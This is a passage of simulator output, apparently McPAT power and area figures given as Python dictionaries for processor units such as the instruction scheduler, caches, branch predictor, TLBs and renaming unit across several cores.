'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0281416,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0306079,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.32125,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0547513,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0883119,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0445769,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.18764,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0626196,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94523,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229652,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0166067,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0169842,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0166067,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192807,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0349857,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0978784,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.912865,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000558191,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000558191,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000491075,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192778,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000243979,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00185144,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00517713,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163273,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.03856,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735756,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0554549,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30747,
'Instruction Fetch Unit/Runtime Dynamic': 0.152386,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0265203,
'L2/Runtime Dynamic': 0.00810344,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51179,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.144816,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0088863,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00888623,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55376,
'Load Store Unit/Runtime Dynamic': 0.197526,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219121,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0438239,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.00777668,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00817479,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0645735,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.012062,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.234041,
'Memory Management Unit/Runtime Dynamic': 0.0202368,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6565,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00247023,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0281876,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0306579,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.32178,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0542721,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0875389,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0441867,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.185998,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0620727,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94416,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00227642,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0164617,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0168355,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0164617,
'Execution Unit/Register Files/Runtime Dynamic': 0.0191119,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0346801,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0973057,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.910481,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000553131,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000553131,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000486817,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000191212,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000241843,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00183492,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00512327,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0161844,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.02946,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.073102,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0549695,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.29794,
'Instruction Fetch Unit/Runtime Dynamic': 0.151214,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0266069,
'L2/Runtime Dynamic': 0.00833448,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51242,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.145492,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.00890668,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00890669,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55448,
'Load Store Unit/Runtime Dynamic': 0.198323,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219623,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0439247,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.00779451,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00819402,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0640083,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0119843,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.233507,
'Memory Management Unit/Runtime Dynamic': 0.0201783,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6462,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00244861,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
